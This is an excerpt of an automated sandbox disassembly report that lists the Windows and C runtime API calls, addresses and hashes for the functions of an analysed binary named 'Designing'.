                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: 0ea6613127f38ea03c9cf0bd66f079aa86908a5aaec4621bb40f502e054858bb
                                              • Instruction ID: 35653084a04dadf88226bdb42a0575221f5e8cd0b316714361164d6ec39d3508
                                              • Opcode Fuzzy Hash: 0ea6613127f38ea03c9cf0bd66f079aa86908a5aaec4621bb40f502e054858bb
                                              • Instruction Fuzzy Hash: 1E318B32154219EBDF21AF64CC49FEB3BA9FF4D324F110255FA55A61A0CBB1D820DBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00B5706B
                                                • Part of subcall function 00B58D58: __getptd_noexit.LIBCMT ref: 00B58D58
                                              • __gmtime64_s.LIBCMT ref: 00B57104
                                              • __gmtime64_s.LIBCMT ref: 00B5713A
                                              • __gmtime64_s.LIBCMT ref: 00B57157
                                              • __allrem.LIBCMT ref: 00B571AD
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B571C9
                                              • __allrem.LIBCMT ref: 00B571E0
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B571FE
                                              • __allrem.LIBCMT ref: 00B57215
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B57233
                                              • __invoke_watson.LIBCMT ref: 00B572A4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                              • Instruction ID: e54997e331042a08c094fc5fb2df633545ab9c3ba01ac634147e4637d77d7c6c
                                              • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                              • Instruction Fuzzy Hash: 2F711571B44B16ABD7149A79DC81B6AB3E8EF01321F1442EAF914E76C1EF70D9488B90
                                              APIs
                                              • _memset.LIBCMT ref: 00B92CE9
                                              • GetMenuItemInfoW.USER32(00BF7890,000000FF,00000000,00000030), ref: 00B92D4A
                                              • SetMenuItemInfoW.USER32(00BF7890,00000004,00000000,00000030), ref: 00B92D80
                                              • Sleep.KERNEL32(000001F4), ref: 00B92D92
                                              • GetMenuItemCount.USER32(?), ref: 00B92DD6
                                              • GetMenuItemID.USER32(?,00000000), ref: 00B92DF2
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00B92E1C
                                              • GetMenuItemID.USER32(?,?), ref: 00B92E61
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B92EA7
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B92EBB
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B92EDC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: 31590b38866965a536db405c99d91a8ea6f59927944f646a45165aca6ef1a4d2
                                              • Instruction ID: 0596e0fd451db0b9be672acca7234df6ed9585796fc393164fc5941e5a203e2a
                                              • Opcode Fuzzy Hash: 31590b38866965a536db405c99d91a8ea6f59927944f646a45165aca6ef1a4d2
                                              • Instruction Fuzzy Hash: B06146B0900649AFDF21DF64D9C8ABEBBE9EB45304F1444A9E841A7251DB31AE05DB21
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BB75CA
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BB75CD
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BB75F1
                                              • _memset.LIBCMT ref: 00BB7602
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB7614
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BB768C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 55553eba4174dd2c8ce5c479f0f4735210a1e6b272060d5658adb48424c49952
                                              • Instruction ID: fc04e213b3d23fb6697a2f907142776e075d955d95dd382afde1acacbc1ca702
                                              • Opcode Fuzzy Hash: 55553eba4174dd2c8ce5c479f0f4735210a1e6b272060d5658adb48424c49952
                                              • Instruction Fuzzy Hash: E6618A75944208AFDB10DFA8CC85EFE77F8EB49710F100199FA15A72A1CBB0AE45DB60
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B877DD
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00B87836
                                              • VariantInit.OLEAUT32(?), ref: 00B87848
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B87868
                                              • VariantCopy.OLEAUT32(?,?), ref: 00B878BB
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B878CF
                                              • VariantClear.OLEAUT32(?), ref: 00B878E4
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00B878F1
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B878FA
                                              • VariantClear.OLEAUT32(?), ref: 00B8790C
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B87917
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 6c578c46ec43e87cea87018ee5b31d6aa97834c3029818deea0eb1be3f323d22
                                              • Instruction ID: d4f8f20e81f0586e3b45dcef5def7168fe3042015082eff0238907ee941b9e9c
                                              • Opcode Fuzzy Hash: 6c578c46ec43e87cea87018ee5b31d6aa97834c3029818deea0eb1be3f323d22
                                              • Instruction Fuzzy Hash: 52414E35A14119EFCB04EFA4D848DAEBBF9EF48304F1080A9E955A7361CB30E945CFA0
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • CoInitialize.OLE32 ref: 00BA8AED
                                              • CoUninitialize.OLE32 ref: 00BA8AF8
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00BC3BBC,?), ref: 00BA8B58
                                              • IIDFromString.OLE32(?,?), ref: 00BA8BCB
                                              • VariantInit.OLEAUT32(?), ref: 00BA8C65
                                              • VariantClear.OLEAUT32(?), ref: 00BA8CC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 00df092e0c2a7f2e0ce783f578943d407e8e392e8a14480e363f933574b754c6
                                              • Instruction ID: c7647c07536d7b340688af01d159c1c59a8b47192489802cbe893317e1215f6d
                                              • Opcode Fuzzy Hash: 00df092e0c2a7f2e0ce783f578943d407e8e392e8a14480e363f933574b754c6
                                              • Instruction Fuzzy Hash: 86618070208711AFD710EF14D889F5AB7E4EF4A714F104899F9859B6A1DB70ED48CBA2
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00B9BB13
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B9BB89
                                              • GetLastError.KERNEL32 ref: 00B9BB93
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00B9BC00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: e80f48d1a674d6d9099cbe1f9f5650c3bd39aadbb6aa8067a152678640cb053b
                                              • Instruction ID: 80f083a60325a8f39e368341165074f5173b7a226bc94b4dbadc5585274743e8
                                              • Opcode Fuzzy Hash: e80f48d1a674d6d9099cbe1f9f5650c3bd39aadbb6aa8067a152678640cb053b
                                              • Instruction Fuzzy Hash: 6E31A135A00209AFCB10EF69D995EAEB7F8EF44304F1481E9E905972E5DB709D41CB91
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B89BCC
                                              • GetDlgCtrlID.USER32 ref: 00B89BD7
                                              • GetParent.USER32 ref: 00B89BF3
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B89BF6
                                              • GetDlgCtrlID.USER32(?), ref: 00B89BFF
                                              • GetParent.USER32(?), ref: 00B89C1B
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B89C1E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: dcaf2ac6926f032f6fe98b130c09c4c72da07c7d6862309b6ba018dc167c4ec2
                                              • Instruction ID: 45d5cd8dd499619ed2383973ec9e6523840bfdea88b752858b87d218a3b63912
                                              • Opcode Fuzzy Hash: dcaf2ac6926f032f6fe98b130c09c4c72da07c7d6862309b6ba018dc167c4ec2
                                              • Instruction Fuzzy Hash: 1F21BD74E00208ABCF04BFA5CC85EFEBBE9EF99310F140295F961972A1DB755964DB20
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B89CB5
                                              • GetDlgCtrlID.USER32 ref: 00B89CC0
                                              • GetParent.USER32 ref: 00B89CDC
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B89CDF
                                              • GetDlgCtrlID.USER32(?), ref: 00B89CE8
                                              • GetParent.USER32(?), ref: 00B89D04
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B89D07
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: f01bb05818a5957437fe1704ba4e71f9428803c88bd951ce692664d63354e1ea
                                              • Instruction ID: e7ec0e8b384fc2bc751646ea91587ac24c69050e69634a8564d70ca2e9c74304
                                              • Opcode Fuzzy Hash: f01bb05818a5957437fe1704ba4e71f9428803c88bd951ce692664d63354e1ea
                                              • Instruction Fuzzy Hash: DB219075E00208ABDF00AFA4CC85EFEBBE9EB94300F1401A5B951972A1DB759955DB20
                                              APIs
                                              • GetParent.USER32 ref: 00B89D27
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00B89D3C
                                              • _wcscmp.LIBCMT ref: 00B89D4E
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B89DC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: cf9c8fe7615d7e472f9ec846ecd57ec49b901abfb017d6e866bb38def5032f35
                                              • Instruction ID: 271c9b25101f59e81a16e426227f45792d86b5cce60877e1df3551c3934a53fe
                                              • Opcode Fuzzy Hash: cf9c8fe7615d7e472f9ec846ecd57ec49b901abfb017d6e866bb38def5032f35
                                              • Instruction Fuzzy Hash: 4911E376248302BAFA003621EC46EB673DCDB15BA5B2000F6FA10A51F1FFA56A119B59
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BA8FC1
                                              • CoInitialize.OLE32(00000000), ref: 00BA8FEE
                                              • CoUninitialize.OLE32 ref: 00BA8FF8
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00BA90F8
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BA9225
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BC3BDC), ref: 00BA9259
                                              • CoGetObject.OLE32(?,00000000,00BC3BDC,?), ref: 00BA927C
                                              • SetErrorMode.KERNEL32(00000000), ref: 00BA928F
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BA930F
                                              • VariantClear.OLEAUT32(?), ref: 00BA931F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: 87c420b811a35c07f90fb4bdc9e7e9f78c374ba95c24382910603865284915e1
                                              • Instruction ID: c5e936cf2b8b65efaf5fbc5f54bab6d5d567e1582fbeb7a003cee28a450f322b
                                              • Opcode Fuzzy Hash: 87c420b811a35c07f90fb4bdc9e7e9f78c374ba95c24382910603865284915e1
                                              • Instruction Fuzzy Hash: 23C11671608305AFD700EF68C884A2BB7E9FF89748F10499DF9899B251DB71ED05CB52
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00B919EF
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A03
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00B91A0A
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A19
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B91A2B
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A44
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A56
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91A9B
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91AB0
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B90A67,?,00000001), ref: 00B91ABB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: d63d94c438a88e4ea5684427fde3095af9da78f1b58f7200248148ed02d7afee
                                              • Instruction ID: 738454bb43e8766fbce0955149f02f592d0d5bd7dee9c83fa95951df310c874a
                                              • Opcode Fuzzy Hash: d63d94c438a88e4ea5684427fde3095af9da78f1b58f7200248148ed02d7afee
                                              • Instruction Fuzzy Hash: 9131BD71661205AFEF10AF28DC88FB977EAEB69315F1089A5F810C7190DFB49D40DB60
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00B3260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00B32617
                                              • SetBkMode.GDI32(?,00000001), ref: 00B3262C
                                              • GetStockObject.GDI32(00000005), ref: 00B32634
                                              • GetClientRect.USER32(?), ref: 00B6C0FC
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B6C113
                                              • GetWindowDC.USER32(?), ref: 00B6C11F
                                              • GetPixel.GDI32(00000000,?,?), ref: 00B6C12E
                                              • ReleaseDC.USER32(?,00000000), ref: 00B6C140
                                              • GetSysColor.USER32(00000005), ref: 00B6C15E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                              • String ID:
                                              • API String ID: 3430376129-0
                                              • Opcode ID: ae4d12df92c550db86989f9800645803f599a69f301146ef0c11f93f8625acae
                                              • Instruction ID: eb24365f560ccc5e8e0849bd072fa6da33a6306dae80833154360e0a70eda6d5
                                              • Opcode Fuzzy Hash: ae4d12df92c550db86989f9800645803f599a69f301146ef0c11f93f8625acae
                                              • Instruction Fuzzy Hash: 8E114C31510205FFDB616FA4EC49FA97BA1EF19322F2442A5FA65A60E1CF314A51EF10
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B3ADE1
                                              • OleUninitialize.OLE32(?,00000000), ref: 00B3AE80
                                              • UnregisterHotKey.USER32(?), ref: 00B3AFD7
                                              • DestroyWindow.USER32(?), ref: 00B72F64
                                              • FreeLibrary.KERNEL32(?), ref: 00B72FC9
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B72FF6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: 26daa8b8e549cedd97f4020477e594f9e653926cd2e0869956ce3560ce3d4ea3
                                              • Instruction ID: 0841e61dbfdc343e8ddc9185b4b053742b5028d955c00e93b0d217ce09d9df53
                                              • Opcode Fuzzy Hash: 26daa8b8e549cedd97f4020477e594f9e653926cd2e0869956ce3560ce3d4ea3
                                              • Instruction Fuzzy Hash: F2A13B707012128FCB29EF14C895B69F7E4EF04700F2482EDE85AAB251DB31AE56DF91
                                              APIs
                                              • EnumChildWindows.USER32(?,00B8B13A), ref: 00B8B078
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: 247e511d71f9dddcda9a0f0d3f42b4a9653d4e9b879ebd0d205ecc696d0c7cf2
                                              • Instruction ID: 7cb2a6416431464fc81313ab051491d1755911f3608f49787023c72f2474971a
                                              • Opcode Fuzzy Hash: 247e511d71f9dddcda9a0f0d3f42b4a9653d4e9b879ebd0d205ecc696d0c7cf2
                                              • Instruction Fuzzy Hash: 59918071A00505EADB18FF60C481BEAFBF5FF04300F14859AE95AA72A1DF306999DB91
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00B3327E
                                                • Part of subcall function 00B3218F: GetClientRect.USER32(?,?), ref: 00B321B8
                                                • Part of subcall function 00B3218F: GetWindowRect.USER32(?,?), ref: 00B321F9
                                                • Part of subcall function 00B3218F: ScreenToClient.USER32(?,?), ref: 00B32221
                                              • GetDC.USER32 ref: 00B6D073
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B6D086
